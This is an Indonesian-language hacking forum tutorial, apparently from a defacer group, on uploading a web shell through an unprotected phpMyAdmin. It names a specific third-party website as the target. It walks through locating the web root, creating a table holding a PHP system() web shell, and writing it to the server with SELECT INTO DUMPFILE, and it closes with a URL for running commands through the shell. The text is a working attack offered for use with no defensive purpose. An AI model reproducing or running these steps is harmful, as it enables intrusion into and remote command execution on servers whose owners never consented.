[TUTOr]Upload shell dari phpmyadmin

ide ini muncul dari postingan om adioranye setelah nyari-nyari target ke sana ke mari kayak cacing yang kepanasan r0~f> penasaran gw karna pernah dipost om ketek cara upload shell dari phpmyadmin
yang pake select * into outfile 'root_directory'

oke gak usah banyak basa-basi langsung aja kita coba targetnya ya


coba buka deh neh

Code:
http://gwsl.co.uk/phpmyadmin/



phpmyadminnya bisa dibuka kan :mrgreen: tanpa pake user+pass mungkin admin nya lagi putus cinta atau lagi kesel ama pacarnya jadi situsnya gak diperhatiin kebanyakan perhatiin tuh cewe

langkah pertama kita harus tau di mana posisi root directory
coba kasi perintah di SQL seperti ini

Code:
SHOW VARIABLES



maka akan muncul basedir

Code:
basedir C:\Program Files\OrangeHRM\2.4.1\mysql\



menurut teropong mama lorent direktorynya ada di

Code:
C:/Program Files/OrangeHRM/2.4.1/htdocs



nah kalau udah tau letak direktory udah dapat tinggal buat database baru dengan nama shell
udah pada ngerti kan semua pake phpmyadmin

setelah dibuat database dengan nama shell di dalam database itu buat table baru dengan mengetikkan perintah

Code:
CREATE TABLE wen(
stack TEXT
) TYPE=MYISaM ;

INSERT INTO wen(stack) VALUES('<pre><body bgcolor=silver><?php @system($_GET["cmd"]) ?> </body></pre>');



maka table aka terbentuk di dalam table tadi yang bernama wen ketikan perintah sql

Code:
select * into dumpfile 'C:/Program Files/OrangeHRM/2.4.1/htdocs/wen.php' from wen



kita sudah membuat file baru dengan nama

Code:
wen.php



untuk menjalankan shell tinggal buka aja
http://gwsl.co.uk/wen.php?cmd=dir

thanks to tey (my best friend) , inc0mpl3t3 ( untuk videonya ) , vires and netheroes crew , mr_mywisdom ( udah sehat lum ? ) dan anak2 gorontalodefacer yg gokil ( gman nih forumnya kok lum bisa dibuka)